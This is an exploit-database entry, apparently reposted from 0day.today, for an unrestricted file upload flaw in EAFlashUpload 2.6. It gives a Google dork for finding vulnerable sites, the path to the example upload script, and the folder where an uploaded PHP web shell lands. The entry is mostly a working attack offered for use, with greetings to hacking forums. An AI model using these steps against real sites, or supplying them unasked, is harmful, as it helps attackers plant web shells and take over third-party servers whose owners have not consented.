id: 18367
date: 05/27/2012
title: EAFlashUpload  Remote File Upload Vulnerability
author: Dr.SiLnT HilL
cves: 

-------------------------------------------------------------------+
# Exploit Title : EAFlashUpload  Remote File Upload
# Date          : 27-5-2012
# Author        : Dr.SiLnT HilL
# Version       : 2.6
# Dork          : inurl:"EAFlashUpload"
# Download      : http://www.easyalgo.com/Downloads/EasyAlgo.EAFlashUpload2.6.zip
# Tested on     : Window xp , pc3
# Site          : Hack-School.com
# MaiL          : Eghack@live.com
+----------------------------------------------------------------------------------+

+-------------------[ Exploit by Dr.SiLnT HilL ]-----------------------------------+

+> p0c :

http://localhost/EasyAlgo.EAFlashUpload2.6/Examples/PHP/simpleupload.php

Exploit :

simpleupload.php : and Upload "PHP" Files :D Simpel exploit

Floder upload : /Examples/PHP/UploadedFiles/Shell.php :xD

+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :

[#1337day.com Inj3ct0r Exploit DataBase 
| Mego | The MMa | Mr.Asla3eek | Soly HacKer | IraQeN H4X0rZ And All Froums Hack-School
#################################



#  0day.today [2023-03-22]  #